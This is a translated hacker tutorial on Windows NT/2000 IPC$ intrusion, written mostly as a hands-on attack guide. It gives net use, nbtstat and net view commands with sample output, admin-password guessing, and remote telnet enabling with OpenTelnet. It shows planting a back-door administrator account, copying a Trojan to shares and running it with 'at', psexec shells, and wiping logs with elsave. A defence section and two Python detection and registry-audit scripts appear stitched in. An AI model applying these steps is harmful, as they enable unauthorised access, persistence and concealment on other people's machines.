Articles about IPC$ intrusion are everywhere, and good ones are not lacking; the attack steps have practically become a classic pattern, so nobody bothers to bring the topic up again. Even so, I personally think these articles are not detailed enough. Someone meeting IPC$ for the first time will not find answers to their confusion in them (just search any hack forum for IPC$ and see how much confusion there is). So I consulted some material, tutorials and forum posts on the Internet and wrote this summary, hoping to clear up the questions that are easily confused and easily misunderstood, so that people do not keep getting stuck in the same place!

Note: everything discussed in this article assumes default settings. Win98 is not covered, and because Win XP improved its security settings, individual operations do not apply to it.

Article navigation:
1: What is IPC$
2: What a null session can do
3: Ports used by IPC$
4: The significance of the IPC$ connection in hack attacks
5: IPC$ connection failure FAQ
6: Causes of file copy failure
7: How to open the target's IPC$ share
8: Related commands that may be used in an intrusion
9: Related commands that may be used in an intrusion (2)
10: IPC$ complete intrusion steps in detail
11: IPC$ complete intrusion steps in detail (2)
12: How to prevent IPC$ intrusion
13: IPC$ intrusion Q&A collection
14: IPC$ intrusion Q&A collection (2)
15: IPC$ intrusion Q&A collection (3)

One. What is IPC$

IPC$ (Internet Process Connection) is a resource that shares "named pipes". It is a named pipe opened for inter-process communication: by supplying a trusted user name and password, the two sides establish a secure channel and exchange encrypted data over it, which gives access to the remote computer. IPC$ is a new feature of NT/2000, and it has the characteristic that only one connection is allowed between two IPs at the same time.

Along with IPC$, NT/2000 also opens the default shares: all logical drives (C$, D$, E$ ...) and the system directory winnt or windows (admin$). Microsoft's original intention for all of these was to make life easier for administrators, but, intentionally or not, they reduce system security.

We often hear people talk about the "IPC$ vulnerability". In fact IPC$ is not a true vulnerability. I think the people who say this must be referring to the "back door" that Microsoft itself put in place: the null session (NULL session). So what is a null session?

Two. What is a null session

Before introducing the null session, we need to understand how a secure session is established. In Windows NT 4.0, a challenge-response protocol is used to establish a session with a remote machine. A successfully established session becomes a secure tunnel through which the two parties exchange information. The process is roughly as follows:

1) The session requester (client) sends a packet to the session receiver (server), requesting that a secure tunnel be established;
2) The server generates a random 64-bit number (the challenge) and sends it back to the client;
3) The client takes the 64-bit number generated by the server, processes it with the password of the account that is trying to establish the session, and returns the result to the server (the response);
4) The server accepts the response and passes it to the Local Security Authority (LSA). The LSA verifies the response using the user's correct password in order to confirm the requester's identity. If the requester's account is a local account on the server, verification happens locally; if the account is a domain account, the response is forwarded to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and sent to the client. The client uses this access token to connect to resources on the server until the established session is terminated.

The above is a rough description of how a secure session is established. So what is a null session?
A null session is a session established with the server without credentials (that is, no user name and password are provided). According to the Win2000 access control model, establishing a null session also requires a token. But because no user information is authenticated while the null session is being established, this token contains no user information, so the session cannot be used by the systems to exchange encrypted information. This does not mean that the token of a null session has no security identifier (SID, which identifies the user and the domain). For a null session, the SID of the token provided by the LSA is S-1-5-7, which is the SID of the null session, and the user name is ANONYMOUS LOGON (this user name can be seen in the user list but cannot be found in the SAM database). The access token contains the following groups:

Everyone
Network

Within the limits of the security policy, the null session is authorized to access all the information that these two groups have the right to access. So what can be done once a null session is established?

Three. What a null session can do

On NT, with the default security settings, a null session can list the users and shares on the target host, access shares that grant permissions to Everyone, access a small part of the registry, and so on; it has no great exploitation value. On 2000 it is even less useful, because in Windows 2000 and later only administrators and backup operators have the right to access the registry from the network, and it is not convenient to do and needs tools.

From this we can see that this untrusted session is not of much use by itself. But in a complete IPC$ intrusion, the null session is an indispensable springboard, because a user list can be obtained through it, and for an experienced hacker that is already enough.
The following are the specific commands that can be used over a null session:

1 First, establish a null session (the target must have IPC$ open):

    net use \\IP\ipc$ "" /user:""

Note: the command above contains four spaces: one between net and use, one after use, and one on each side of the password.

2 View the shared resources of the remote host:

    net view \\IP

Explanation: after the null connection is established, this command shows the shared resources of the remote host. If it has shares open, you get a result similar to the following:

    Shared resources at \\*.*.*.*

    Share name   Type   Comment
    -----------------------------------------------------------
    NETLOGON     Disk   Logon server share
    SYSVOL       Disk   Logon server share
    The command completed successfully.

3 View the current time of the remote host:

    net time \\IP

Explanation: this command returns the current time of the remote host.

4 Get the NetBIOS user name list of the remote host (your own NBT must be enabled):

    nbtstat -A IP

This command returns the NetBIOS user name list of the remote host (your own NetBIOS support is required). The result looks like this:

    Node IpAddress: [*.*.*.*] Scope Id: []

    NetBIOS Remote Machine Name Table

    Name               Type     Status
    ---------------------------------------------
    SERVER          <00> UNIQUE Registered
    OYAMANISHI-H    <00> GROUP  Registered
    OYAMANISHI-H    <1C> GROUP  Registered
    SERVER          <20> UNIQUE Registered
    OYAMANISHI-H    <1B> UNIQUE Registered
    OYAMANISHI-H    <1E> GROUP  Registered
    SERVER          <03> UNIQUE Registered
    OYAMANISHI-H    <1D> UNIQUE Registered
    ..__MSBROWSE__. <01> GROUP  Registered
    INet~Services   <1C> GROUP  Registered
    IS~SERVER...... <00> UNIQUE Registered

    MAC Address = 00-50-8B-9A-2D-37

These are the things a null session is most often used for. It looks as though a lot can be obtained, but note one point: establishing an IPC$ connection leaves a record in the Event Log, whether or not the logon succeeds.
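The Event Log trail mentioned above can be turned into a detection. The following is an added example, not part of the original article: it flags sources that open a null session (SID S-1-5-7 over IPC$) and then fail logons against several account names. The record layout, the event IDs 4624/4625/5140 of the modern Windows Security log, the sample addresses and the function names are assumptions made for the example.

```python
from collections import defaultdict

ANONYMOUS_SID = "S-1-5-7"   # SID carried by a null-session token (from the text above)
NETWORK_LOGON = 3           # logon type recorded for connections arriving over the network

# Constructed sample records (not real logs). The field names are an assumption,
# modelled on Windows Security events 4624 (logon), 4625 (failed logon) and
# 5140 (network share accessed).
SAMPLE_EVENTS = [
    {"id": 4624, "sid": "S-1-5-7", "user": "ANONYMOUS LOGON", "logon_type": 3, "src": "10.0.0.23"},
    {"id": 5140, "sid": "S-1-5-7", "user": "ANONYMOUS LOGON", "share": r"\\*\IPC$", "src": "10.0.0.23"},
    {"id": 4625, "user": "administrator", "logon_type": 3, "src": "10.0.0.23"},
    {"id": 4625, "user": "guest", "logon_type": 3, "src": "10.0.0.23"},
    {"id": 4625, "user": "backup", "logon_type": 3, "src": "10.0.0.23"},
    {"id": 4624, "sid": "S-1-5-7", "user": "ANONYMOUS LOGON", "logon_type": 3, "src": "10.0.0.40"},
    {"id": 5140, "sid": "S-1-5-7", "user": "ANONYMOUS LOGON", "share": r"\\*\IPC$", "src": "10.0.0.40"},
    {"id": 4624, "sid": "S-1-5-21-1111-2222-3333-1104", "user": "alice", "logon_type": 3, "src": "10.0.0.51"},
    {"id": 5140, "sid": "S-1-5-21-1111-2222-3333-1104", "user": "alice", "share": r"\\*\IPC$", "src": "10.0.0.51"},
    {"id": 4625, "user": "alice", "logon_type": 3, "src": "10.0.0.51"},
]


def summarize(events):
    """Collect per-source counters: anonymous logons, anonymous IPC$ use, failed account names."""
    stats = defaultdict(lambda: {"anon_logons": 0, "anon_ipc": 0, "failed_users": set()})
    for ev in events:
        src = ev.get("src", "unknown")
        anonymous = ev.get("sid") == ANONYMOUS_SID
        if ev["id"] == 4624 and anonymous and ev.get("logon_type") == NETWORK_LOGON:
            stats[src]["anon_logons"] += 1
        elif ev["id"] == 5140 and anonymous and ev.get("share", "").upper().endswith("IPC$"):
            stats[src]["anon_ipc"] += 1
        elif ev["id"] == 4625 and ev.get("logon_type") == NETWORK_LOGON:
            stats[src]["failed_users"].add(ev.get("user", "").lower())
    return stats


def findings(events, guess_threshold=3):
    """Return (source, verdict) pairs for sources that show null-session behaviour.

    A null session alone is reported; a null session followed by failed logons
    against `guess_threshold` or more distinct accounts is reported as the
    enumerate-then-guess pattern the article describes.
    """
    out = []
    for src, s in sorted(summarize(events).items()):
        null_session = s["anon_logons"] > 0 and s["anon_ipc"] > 0
        guessing = len(s["failed_users"]) >= guess_threshold
        if null_session and guessing:
            out.append((src, "null session followed by password guessing"))
        elif null_session:
            out.append((src, "null session"))
        elif guessing:
            out.append((src, "password guessing"))
    return out


if __name__ == "__main__":
    for source, verdict in findings(SAMPLE_EVENTS):
        print(f"{source}: {verdict}")
```

An authenticated user who touches IPC$ (alice in the sample) is not flagged, because the match is on the anonymous SID rather than on the share name alone.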

OK, next let's look at the ports that IPC$ uses.

Four. Ports used by IPC$

First, some basic knowledge:

1 SMB (Server Message Block): a Windows protocol used for file and print sharing services;
2 NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to implement NetBIOS networking on top of TCP/IP;
3 In Windows NT, SMB is implemented on top of NBT; in Windows 2000, besides the NBT implementation, SMB can also be implemented directly over port 445.

With this basic knowledge we can discuss which ports are chosen when network shares are accessed.

For a Win2000 client:

1 If NBT is enabled when it connects to the server, the client tries ports 139 and 445 at the same time. If port 445 responds, it sends an RST packet to port 139 to disconnect and carries on the session over port 445; port 139 is used only when port 445 does not respond. If neither port responds, the session fails;
2 If NBT is disabled when it connects to the server, the client tries only port 445; if port 445 does not respond, the session fails. So a Win2000 client with NBT disabled fails as soon as port 445 does not respond.

For a Win2000 server:

1 If NBT is enabled, UDP ports 137 and 138 and TCP ports 139 and 445 are open;
2 If NBT is disabled, only port 445 is open.

The IPC$ sessions we establish follow the same principles. Obviously, if the remote server does not listen on port 139 or 445, an IPC$ session cannot be established.

Five. The significance of the IPC$ connection in hack attacks

As said above, even with only a null connection a lot of information can be obtained (and this information is often essential to an intrusion). If you can log in as a user with certain permissions, you get the corresponding permissions; and obviously, if you log in as an administrator, then nothing is off limits and you can basically do whatever you want.
But don't celebrate too early, because the administrator's password is not that easy to get. There will always be some careless administrators with weak passwords, but they are few, and things are not what they used to be: as people's security awareness has grown, administrators have become more careful, and getting the administrator's password will keep getting harder. So the most likely outcome is that you connect with minimal permissions or none at all, or that the host does not even have the IPC$ share open and you cannot connect. You will slowly discover that the IPC$ connection is not a cure-all, so don't expect every connection to succeed; that is unrealistic.
Feeling a little discouraged? There is no need. The key is to keep the right attitude: don't treat IPC$ intrusion as an ultimate weapon and don't think it is invincible. It is just one intrusion method. You may strike home with it, or you may get nothing at all; both are normal. In the world of hackers not every road leads to Rome, but there is always one road that does, so look for it patiently!

Six. Common reasons for IPC$ connection failure

The following are common reasons why an IPC$ connection fails:

1 The IPC connection is a feature unique to Windows NT and above. Because it relies on many DLL functions of Windows NT, it cannot run on Windows 9.x/ME; that is, only NT/2000/XP can establish IPC$ connections with each other, and 98/ME cannot establish an IPC$ connection;
2 To establish an IPC$ connection successfully, the other party must have the IPC$ share open. This is true even for a null connection: if the other party has closed the IPC$ share, the connection fails;
3 You have not started the Lanmanworkstation service. It provides network links and communication; without it you cannot initiate a connection request (display name: Workstation);
4 The other party has not started the Lanmanserver service. It provides RPC support and file, print and named pipe sharing, and IPC$ depends on it; without it the remote host cannot respond to your connection request (display name: Server);
5 The other party has not started NetLogon, which supports pass-through account logon for computers on the network;
6 The other party has disabled NBT (that is, port 139 is not open);
7 The other party's firewall blocks ports 139 and 445;
8 Your user name or password is wrong (obviously a null session rules this error out);
9 The command was typed incorrectly, perhaps with extra or missing spaces. When the user name and password contain no spaces, the double quotes on both sides can be omitted; if the password is empty, just enter two quotation marks "";
10 If the other party restarts the computer while the connection is established, the IPC$ connection is dropped automatically and has to be established again.

In addition, you can analyse the cause from the error number that is returned:

Error 5, access denied: very likely the user you are using does not have administrator privileges; raise your privileges first;
Error 51, Windows cannot find the network path: there is a problem with the network;
Error 53, the network path was not found: wrong IP address; the target is not powered on; the target's Lanmanserver service is not started; the target has a firewall (port filtering);
Error 67, the network name cannot be found: your Lanmanworkstation service is not started, or the target has deleted IPC$;
Error 1219, the credentials supplied conflict with an existing set of credentials: you have already established an IPC$ connection with the other party; delete it and connect again;
Error 1326, unknown user name or bad password: the reason is obvious;
Error 1792, an attempt was made to log on, but the network logon service was not started: the target's NetLogon service is not started;
Error 2242, the password of this user has expired: the target has an account policy that forces regular password changes.

Seven. Reasons why copying files fails

Some friends establish the IPC$ connection successfully but run into trouble when copying and cannot get the copy to succeed. So what are the common causes of copy failure?

1 Blind copying
This kind of error is the most frequent and accounts for more than 50%. Many friends do not even know whether the other party has a shared folder and copy blindly; the result is failure and a lot of frustration. So I suggest that you always use the net view \\IP command before copying. Do not assume that because the IPC$ connection was established, a shared folder must exist.

2 Misjudging the default shares
This kind of error is also common and has two aspects:
1) Mistakenly believing that any host to which an IPC$ connection can be established must have its default shares open, and therefore copying files to a default share such as admin$ immediately after connecting, which makes the copy fail. A successful IPC$ connection only shows that the other party has the IPC$ share open. The IPC$ share and the default shares are two different things: the IPC$ share is a named pipe, not an actual folder, and the default shares are not a necessary condition for IPC$;
2) Because net view \\IP cannot display the default shares (the default shares carry a $), we cannot tell from it whether the other party has the default shares open. If the default shares are not open, every operation against them fails (most scanning software, however, can find the default share directories while it scans for passwords, which avoids this kind of error).

3 Insufficient user privileges, which covers four cases:
1) With a null connection, copying to any share (default or ordinary) fails in most cases for lack of permissions;
2) Copying to a default share requires administrator privileges;
3) Copying to an ordinary share requires the appropriate permissions (that is, the access the other party configured in advance);
4) The other party can block external access to shares with a firewall or security software.
One more point needs explaining: do not assume that "administrator" is an administrator; the administrator's name can be changed.
4 Killed by the firewall, or the target is in a local area network
Your copy may well have succeeded, but the file was killed by the firewall when it ran on the remote host, so the file cannot be found; or you may have copied the Trojan to a host inside a LAN, which makes the connection fail. So take care when you copy, or you will end up having to give up.

As everyone knows, all sorts of problems come up in practice with IPC$ connections. The above only summarises some common mistakes; the ones I have not mentioned you will have to work out for yourself.

Eight. How to open the target's IPC$ share and other shares

The target's IPC$ is not easy to open, otherwise the world would be in chaos. You need a shell with admin privileges, such as telnet or a Trojan. In that shell, run net share ipc$ to open the target's IPC$, and net share ipc$ /del to close the share. To open a shared folder, use net share baby=c:\ which shares its C drive under the share name baby.

Nine. Commands that need a shell to complete

Many tutorials are inaccurate on this point: commands that can only be completed in a shell are presented too simply, which is misleading. So here is a summary of the operations that must be completed in a shell:

1 Creating a user, activating a user, changing a user's password and adding a user to the administrators group all have to be done in a shell;
2 Opening the remote host's IPC$ share, default shares or ordinary shares has to be done in a shell;
3 Starting or stopping a service on the remote host has to be done in a shell;
4 Starting or killing a process on the remote host has to be done in a shell.

Ten. Related commands that may be used in an intrusion

Please note whether a command applies locally or remotely. If it applies locally, you can only run it against the remote host after obtaining a shell on that host.

1 Establish a null connection:
    net use \\IP\ipc$ "" /user:""
2 Establish a non-null connection:
    net use \\IP\ipc$ "psw" /user:"account"
3 View the shared resources of the remote host (default shares are not shown):
    net view \\IP
4 View the shared resources of the local host (local default shares are shown):
    net share
5 Get the user name list of the remote host:
    nbtstat -A IP
6 Get the user list of the local host:
    net user
7 View the current time of the remote host:
    net time \\IP
8 Display the services currently running on the local host:
    net start
9 Start or stop a local service:
    net start servicename /y
    net stop servicename /y
10 Map a remote share:
    net use z: \\IP\baby
This command maps the shared resource named baby to drive Z.
11 Delete a share mapping:
    net use c: /del       deletes the mapped C drive; other drives likewise
    net use * /del /y     deletes all mappings
12 Copy a file to the remote host:
    copy \path\srv.exe \\IP\sharename
For example, copy ccbirds.exe \\*.*.*.*\c copies the file in the current directory to the other party's C drive.
13 Add a scheduled task remotely:
    at \\IP time program
For example: at \\127.0.0.0 11:00 love.exe
Note: the time uses the 24-hour format. If the program is in the system's default search path (such as system32\), no path is needed; otherwise the full path must be given.
14 Open Telnet on the remote host
This needs a small program, OpenTelnet.exe, which is available from all the major download sites, and four requirements must be met:
1) The target has the IPC$ share open
2) You have an administrator password and account
3) The target has the RemoteRegistry service started
4) Valid for Win2K/XP; NT untested
Command format: OpenTelnet.exe \\server account psw NTLM-authentication-mode port
Example:
    C:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 Activate a user / add a user to the administrators group:
    1 net user account /active:yes
    2 net localgroup administrators account /add
16 Close Telnet on the remote host
This also needs a small program: ResumeTelnet.exe
Command format: ResumeTelnet.exe \\server account psw
Example:
    C:\>ResumeTelnet.exe \\*.*.*.* administrator ""
17 Delete an established IPC$ connection:
    net use \\IP\ipc$ /del

Eleven. IPC$ complete intrusion steps in detail

The actual steps differ with each person's preferences; I will only describe the common ones, and please excuse my poor skills!

1 Use scanning software to find hosts, such as streamer, SSS or X-scan, whichever you prefer, and then lock on to a target. If the scan turns up a password with administrator privileges, you can carry on with the steps below.
Suppose the Administrator password you obtained is empty.

2 At this point you have two roads to choose from: either open telnet on it (command line), or give it a Trojan (graphical interface). Let's take the telnet road first.

3 The command for opening telnet was given above; we will use the small program OpenTelnet:

    C:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
    *******************************************************
    Remote Telnet Configure, by refdom
    Email: refdom@263.net
    OpenTelnet.exe
    Usage: OpenTelnet.exe \\server username password NTLMAuthor telnetport
    *******************************************************
    Connecting \\192.168.21.*...Successfully!
    NOTICE!!!!!!
    The Telnet Service default setting: NTLMAuthor=2 TelnetPort=23
    Starting telnet service...
    telnet service is started successfully! telnet service is running!
    BINGLE!!! Yeah!!
    Telnet Port is 90. You can try: "telnet ip 90", to connect the server!
    Disconnecting server...Successfully!

* Note: you have now opened Telnet on port 90.

4 Now we telnet in:

    telnet 192.168.21.* 90

If this succeeds, you get a shell on the remote host. At this point you can control your "broiler" (the compromised host) just like your own machine. What to do with it? Activate guest and add it to the administrators group, which counts as leaving a back door.

5 C:\>net user guest /active:yes
* Activates the guest user. The guest account may already be active; you can use net user guest to see whether its "account active" value is Yes or No.

6 C:\>net user guest 1234
* Changes guest's password to 1234, or to any password you like.

7 C:\>net localgroup administrators guest /add
* Makes guest an administrator, so that even after the administrator changes his password we can still log in as guest. A reminder, though: through security policy settings, remote access by accounts such as guest can be prohibited. If that is the case, our back door is useless as well, so may God bless guest.

8 OK, now let's take the other road and give it a Trojan.

9 First, establish an IPC$ connection:

    C:\>net use \\192.168.21.*\ipc$ "" /user:administrator

10 Since we want to upload something, we must first know what it shares:

    C:\>net view \\192.168.21.*
    Shared resources at \\192.168.21.*

    Share name   Type   Comment
    -----------------------------------------------------------
    C            Disk
    D            Disk
    The command completed successfully.

* Good, we can see that the other party shares drives C and D, and we can copy files to either of them. To stress it once more: because the default shares cannot be seen with the net view command, we cannot tell from it whether the other party has the default shares open.

11 C:\>copy love.exe \\192.168.21.*\c
    1 file copied.
* This command passes the Trojan client love.exe to the other party's C drive. Of course, if you can copy it into the system folder that is best, because it is not easily found there.

12 Before running the Trojan, first look at its current time:

    net time \\192.168.21.*
    The current time at \\192.168.21.* is 2003/8/22 11:00 AM
    The command completed successfully.

13 Now we run it with AT, but the other party must have the Task Scheduler service started (it allows programs to run at a specified time), otherwise this does not work:

    C:\>at \\192.168.21.* 11:02 c:\love.exe
    Added a new job with job ID = 1

14 What remains is waiting. After 11:02 you can try to connect with the control terminal; if it succeeds, you will be able to control the remote host through a graphical interface. If the connection fails, the host may be inside a local area network, or the program may have been killed by the firewall, or the host may have gone offline (that would be quite a coincidence). Whatever the case, you have to give up.

Well, those are the two basic methods. Once you are familiar with them, you can use more efficient routines, such as cloning guest with CA, running the Trojan with psexec, or gaining a shell directly with the command psexec \\tergetip -u user -p paswd cmd.exe, and so on. All of these are possible; it is up to you. But don't forget to clean the logs; you can use Gongge's elsave.exe.

Having said so much about IPC$ intrusion, we cannot avoid saying how to prevent it. So how do we defend? See below.

Twelve. How to prevent IPC$ intrusion

1 Prohibit enumeration over null connections (this operation does not stop null connections from being established)

Method 1: run regedit, find the following key
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
and change the value of restrictanonymous (DWORD) to 1.
If it is set to 1, an anonymous user can still connect to the IPC$ share, but enumerating information such as SAM accounts and shares through this connection is restricted. In Windows 2000 the value 2 was added, which restricts all anonymous access unless it is explicitly permitted. Setting it to 2 may cause some other problems, so setting it to 1 is recommended.
If the key mentioned above does not exist, create it and then set the value.

Method 2: Local Security Settings - Local Policies - Security Options - make the corresponding setting under "Additional restrictions for anonymous connections".

2 Disable the default shares

1) View the local shared resources
Run - cmd - enter net share

2) Delete the shares (after a restart the default shares still exist)
    net share ipc$ /delete
    net share admin$ /delete
    net share c$ /delete
    net share d$ /delete
(if there are e, f, ... continue deleting in the same way)

3) Stop the Server service
    net stop server /y
(after the Server service is restarted, the shares are opened again)

4) Prohibit the default shares from being opened automatically (this operation does not close the IPC$ share)
Run - regedit
Server edition: find the following key
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
and change the value of AutoShareServer (DWORD) to 00000000.
Pro edition: find the following key
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
and change the value of AutoShareWks (DWORD) to 00000000.
If the value mentioned above does not exist, create it (right-click - New - DWORD value) and then set it. These two values do not exist on the host by default and have to be added manually.

3 Turn off the service that IPC$ and the default shares depend on: the Server service
Control Panel - Administrative Tools - Services - find the Server service (right-click) - Properties - General - Startup type - select Disabled.
A prompt may appear at this point saying that XXX service will also be shut down and asking whether to continue; this is because some secondary services depend on Lanmanserver. Ignore it.

4 Block ports 139 and 445
Without the support of these two ports an IPC$ connection cannot be established, so blocking ports 139 and 445 also prevents IPC$ intrusion.
1) Port 139 can be blocked by disabling NBT:
Local Area Connection - TCP/IP Properties - Advanced - WINS - select "Disable NetBIOS over TCP/IP".
2) Port 445 can be blocked by modifying the registry. Add a value:
Hive: HKEY_LOCAL_MACHINE
Key: System\CurrentControlSet\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Value: 0
Restart the machine after making the change.
Note: if the two ports above are blocked, you will not be able to use IPC$ to intrude on others either.
3) Install a firewall for port filtering.

5 Set a complex password to prevent passwords from being exhausted through IPC$.

Thirteen. IPC$ intrusion Q&A collection

I have said a lot of theory above, but in practice you will run into all kinds of questions. So, to give everyone the greatest help, I went through several security forums, found a great many posts and organised some representative questions and answers. Some of the answers are mine and some are replies from the forums; if there are omissions or mistakes, please bear with me.

1. An IPC$ intrusion leaves a record on the server. Is there any way to keep the server from finding out?
A: Leaving a record is certain. You can delete it with a program afterwards, or intrude through a "broiler" (a compromised host).

2. Look at the situation below: I can connect but I cannot copy.
    net use \\***.***.***.***\ipc$ "password" /user:"user name"
    The command completed successfully.
    copy icmd.exe \\***.***.***.***\admin$
    The network path was not found.
    The command did not complete successfully.
A: There are two possible reasons:
1) Your permissions are not enough and you cannot access the default share;
2) The other party has not opened the admin$ default share. Do not assume that because the IPC$ connection worked, the other party must have the default shares open (many people think so, and it is a misunderstanding!). In this case you can try other default shares or ordinary shares, such as c$, d$, c, d and so on. If that still does not work, it depends on your permissions: if you have administrator privileges you can open telnet, and if that succeeds you can then open a share.

3. If the other party has IPC$ open and a null connection can be established, but I am asked for a password when opening the C or D drive, I know the null connection does not have much permission, but is there no other way?
A: I suggest guessing the password with streamer or another tool. If you cannot guess it, you can only give up; after all, what a null connection can do is limited.

4. I have already guessed the administrator's password and the IPC$ connection succeeded, but net view \\IP shows that the default shares are not open. What should I do?
A: First let me correct a mistake: net view cannot show the default shares. Since you now have administrator privileges and the other party has IPC$ open, I suggest opening its telnet with OpenTelnet.exe. Once you have that shell, you can do anything.

5. After the IPC$ connection succeeded, I used the following command to create an account, but I found the account on my own machine. What is going on?
    net user ccbirds /add
A: A successful IPC$ connection only shows that you have established a communication tunnel with the remote host; it does not mean that you have a shell. Only after you get a shell can you create an account remotely; otherwise your operations are carried out locally.

6. I have got into a "meat machine" (a compromised host) using the administrator account and I can see its system time, but I cannot copy a program onto it. Each time it says "Access denied, 0 file(s) copied". Has the other party set up some service? What should I do?
A: Besides insufficient permissions, the reason you cannot copy files may be that the other party has closed c$, d$ and the other default administrative shares, or that the other party uses the NTFS file system, where through settings even an administrator may be unable to write files remotely. Since you have administrator privileges, go in over telnet and then open the share.

7. Can I use Win98 to establish an IPC$ connection with the other party?
A: No. For IPC$ operations, Win2000 is recommended.

8. I used net use \\IP\ipc$ "" /user:"" and successfully established a null session, but nbtstat -A IP cannot export the user list. Why?
A: A null session can export the user list by default, but if the administrator has disabled exporting the list by modifying the registry, you get what you describe. Or your own NBT is not enabled; nbtstat is built on top of NBT.

9. When I establish an IPC$ connection, the following message is returned: "The credentials supplied conflict with an existing set of credentials". What is going on?
A: This shows that you have established more than one IPC$ connection with the target host, which is not allowed. Delete the others: net use \\*.*.*.*\ipc$ /del

10. When mapping, this appears:
    F:\>net use h: \\211.161.134.*\e$
    System error 85 has occurred.
    The local device name is already in use.
How is this happening?
A: You are too careless. This shows that your H drive is already in use; map to another drive letter!

11. I established a connection, F:\>net use \\*.*.*.*\ipc$ "123" /user:"ccbirds", and it succeeded, but when I map a drive I am asked for a password. What happened?
    F:\>net use h: \\*.*.*.*\c$
    The password is invalid for \\*.*.*.*\c$.
    Type the password for \\*.*.*.*\c$:
    System error 5 has occurred.
    Access is denied.
A: Being asked for a password shows that your current user's permissions are not enough to map the c$ default share. Find a way to raise your permissions or find a weak administrator password! Default shares generally require administrator privileges.

12. I used superscan and found a host with port 139 open, but why can't I get a null connection?
A: You have confused the relationship between IPC$ and port 139. A host that accepts an IPC$ null connection must have port 139 or 445 open, but a host with these two ports open does not necessarily accept a null connection, because the other party can turn off the IPC$ share.

13. Most of the machines on our local area network are XP. I used streamer and found several Administrator accounts with empty passwords. I can connect, but I cannot copy anything; it says error 5. Why?
A: XP's security is higher. In the default security policy settings, when a local account is authenticated over the network, it is by default given only guest permissions; even if you log in remotely as administrator you have only guest rights. So copying a file naturally gives error 5: insufficient permissions.

14. I used net use \\192.168.0.2\ipc$ "password" /user:"administrator" successfully, but net use i: \\192.168.0.2\c asks me to type the password for \\192.168.0.2. What is going on?
A: Although you have administrator privileges, the administrator may not have allowed administrator access when setting the share-level permissions of the C drive, which is why the problem appears.
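
The registry settings from section Twelve can be checked in one pass over a registry export. The following is an added example, not part of the original article: it parses the text of a .reg export and reports which of the article's values (restrictanonymous, AutoShareServer or AutoShareWks, SMBDeviceEnabled) are set as recommended. The sample export is constructed, and the function names and report wording are assumptions made for the example.

```python
import re

LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
LANMAN = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
NETBT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters"

SECTION_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{1,8})$')

# Constructed sample export (not taken from a real host).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000000
"Lmannounce"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"NbProvider"="_tcp"
"""


def parse_reg(text):
    """Return {(key, value_name): int} for every DWORD value in a .reg export.

    Key paths and value names are lower-cased because the registry is
    case-insensitive; non-DWORD values are ignored.
    """
    values, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        section = SECTION_RE.match(line)
        if section:
            key = section.group(1).lower()
            continue
        dword = DWORD_RE.match(line)
        if dword and key:
            values[(key, dword.group(1).lower())] = int(dword.group(2), 16)
    return values


def checks_for(edition):
    """The values section Twelve asks for; the AutoShare name depends on the edition."""
    auto_share = "AutoShareServer" if edition == "server" else "AutoShareWks"
    return [
        (LSA, "restrictanonymous", {1, 2},
         "null sessions can still enumerate SAM accounts and shares"),
        (LANMAN, auto_share, {0},
         "default shares are opened again automatically"),
        (NETBT, "SMBDeviceEnabled", {0},
         "SMB is still reachable directly on port 445"),
    ]


def audit(reg_text, edition="server"):
    """Return (value_name, status, risk) tuples; status is ok, weak or missing."""
    values = parse_reg(reg_text)
    report = []
    for key, name, good, risk in checks_for(edition):
        current = values.get((key.lower(), name.lower()))
        if current is None:
            status = "missing"      # the article notes some of these do not exist by default
        elif current in good:
            status = "ok"
        else:
            status = "weak"
        report.append((name, status, "" if status == "ok" else risk))
    return report


if __name__ == "__main__":
    for name, status, risk in audit(SAMPLE_EXPORT):
        print(f"{name:20} {status:8} {risk}")
```

A "missing" result is treated as a finding because an absent value leaves the default behaviour in place.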